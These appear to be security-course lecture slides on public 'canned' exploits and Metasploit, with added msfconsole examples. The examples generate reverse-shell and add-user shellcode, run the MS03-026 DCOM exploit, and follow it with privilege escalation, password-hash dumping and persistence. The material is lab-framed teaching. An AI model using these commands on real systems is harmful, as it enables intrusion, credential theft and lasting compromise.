“Canned” Exploits
• For many known vulnerabilities attackers do not have to write their own exploit code
• Many public repositories carry vulnerability information, exploits and shellcode, of very mixed quality and intent:
– www.securityfocus.com
– milw0rm.com (now defunct; its archive was carried on by exploit-db.com)
– www.metasploit.com
• Caveat: a canned exploit is written against specific versions, offsets and addresses, and code from an untrusted source can itself be malicious. Read it before compiling it, and run it only against lab machines.

Canned Exploit Code Demo 1
• Example: a (local) kernel exploit
– http://www.securityfocus.com/bid/9138/
• Let’s:
– Download the exploit code referenced on securityfocus
– Compile it on the victim’s machine (.204)
– Run it on the victim’s machine as guest, an unprivileged account; a successful local kernel exploit hands that account root

Canned Exploit Code Demo 2
• Example: a (remote) exploit
– http://www.securityfocus.com/bid/8205 (the Windows RPC DCOM overflow, MS03-026; the same bug is used again in Metasploit Demo 1)
• Let’s:
– Compile the exploit on the machine compromised in Demo 1 (.204)
– Attack another machine (.202) from it

The Metasploit Framework
• An exploit development, testing, and deployment tool
• URL: http://www.metasploit.com/
– Free (community edition)
• Decouples the two parts of an exploit:
– Attack vector: the code that triggers the vulnerability and delivers bytes to the target
– Payload: the code those bytes run once control is gained
• Any payload compatible with a vector’s target (platform, architecture, space available) can be paired with it at run time, so neither part has to be rewritten for the other

Metasploit – Attack Vectors
• Many from which to choose:
– Operating systems
• Windows, Linux, Mac, Unix, Cisco, etc.
– Services
• Web, database, e-mail, FTP, etc.
• Extensible and configurable

Metasploit – Payloads
• Can be used to generate shellcode
– Framework comes with many useful payloads
• Spawn shell
• Run command
• Add privileged user
– Configurable (listener address and port, encoder, bytes to avoid)
– Extensible

Metasploit Demo 1
• Example: the vulnerability that the MSBlaster worm exploited
– http://www.securityfocus.com/bid/8205
• Let’s use Metasploit to:
– Choose the attack vector
– Choose the payload
– Run the exploit
– Interact with the compromised host

Metasploit Demo 2
• Example: a web browser vulnerability (client-side: the victim’s browser connects to the attacker, so the exploit lands with the browsing user’s privileges rather than a service account’s)
• Let’s use Metasploit to:
– Choose the attack vector
– Choose the payload
– Run the exploit
– Interact with the compromised host
• Elevate privileges
• Set up persistence
• Capture passwords

Summary
• For many known vulnerabilities attackers do not have to write their own exploit code
– “Canned” exploits
– The Metasploit Framework
• Choose and configure an attack vector
• Choose and configure a payload
• Interact with host
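The shellcode generation from the Metasploit – Payloads slide, and the substitution it enables in the Canned Exploit Code demos (dropping a framework payload into a downloaded exploit’s buffer and catching the callback), as an added example that is not part of the original slides. These are msfconsole commands in current framework syntax (option names vary between releases; check `generate -h`). The 10.0.0.204 attacker address, port 4444 and the user/password are assumed lab values; only the .204 host number comes from the slides.

```text
# Added example: generate a payload from msfconsole and stand up a listener for it.
# Addresses are assumed lab values (.204 = the host the slides use as the launch point).

# Pick a payload. A single-stage reverse shell fits where a canned exploit has room
# for a complete payload; a staged one (windows/shell/reverse_tcp) needs only a small stub.
use payload/windows/shell_reverse_tcp
set LHOST 10.0.0.204
set LPORT 4444

# Emit the bytes as a C array so they can be pasted into a canned exploit's buffer.
# -b lists bytes the delivery path cannot carry (a NUL terminates C strings); the
# framework then selects an encoder (x86/shikata_ga_nai) that avoids them.
generate -b '\x00' -f c

# Alternative payload for the "add privileged user" case on the slide: no callback needed.
use payload/windows/adduser
set USER backup
set PASS Lab-Passw0rd!
generate -b '\x00' -f c

# Catch the connection the reverse shell makes when the canned exploit fires.
# multi/handler is the generic listener; its payload settings must match exactly.
use exploit/multi/handler
set PAYLOAD windows/shell_reverse_tcp
set LHOST 10.0.0.204
set LPORT 4444
exploit -j
# Once "Command shell session 1 opened" appears, attach to it:
sessions -i 1
```

The point of the handler step is the decoupling from the framework slide: the canned exploit supplies only the attack vector, the framework supplies the payload and the listener, and the two meet on the wire.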
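The four steps of Metasploit Demo 1 as a resource script, followed by the post-exploitation steps of Metasploit Demo 2 (elevate privileges, set up persistence, capture passwords), as an added example that is not part of the original slides. The MS03-026 module name is the framework’s real one for BID 8205; the persistence module is assumed present in the installed framework; 10.0.0.202 (target) and 10.0.0.204 (attacker) are assumed lab addresses whose host numbers follow the slides.

```text
# Added example: ms03_026.rc, a resource script driving the four steps of Demo 1.
# Run with:  msfconsole -q -r ms03_026.rc
# Hosts are assumed lab values: 10.0.0.202 is the target, 10.0.0.204 the attacker.

# 1. Choose the attack vector: the MS03-026 RPC DCOM overflow (BID 8205), the bug
#    MSBlaster used. Older framework releases name the target option RHOST.
use exploit/windows/dcerpc/ms03_026_dcom
set RHOSTS 10.0.0.202
show targets      # exploit modules carry version-specific addresses; this one has a single universal target

# 2. Choose the payload: any payload compatible with the vector's target can be paired
#    with it. A staged Meterpreter calling back to the attacker provides the
#    post-exploitation commands used below; windows/shell/reverse_tcp gives a plain cmd.exe.
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.0.0.204
set LPORT 4444

# 3. Run the exploit as a background job so the console stays usable.
exploit -j

# 4. Interact with the compromised host. The lines below are typed at the msfconsole
#    and meterpreter prompts once a session has opened; they are not part of the .rc file.
sessions -l        # list open sessions
sessions -i 1      # attach to session 1
getuid             # RPC DCOM runs as SYSTEM; a browser exploit (Demo 2) lands as the browsing user
getsystem          # elevate privileges when getuid shows a plain user
hashdump           # capture password hashes from the SAM (needs SYSTEM)
background         # return to msfconsole, keep the session alive

# Persistence (Demo 2): re-launch the payload at startup via a local exploit module
# (assumed present in the installed framework; confirm with `search persistence`).
use exploit/windows/local/persistence
set SESSION 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.0.0.204
set LPORT 4444
exploit
```

`getuid` before `getsystem` is the check worth keeping: it shows which of the two demos’ situations you are in, and `hashdump` will fail until the session really is SYSTEM.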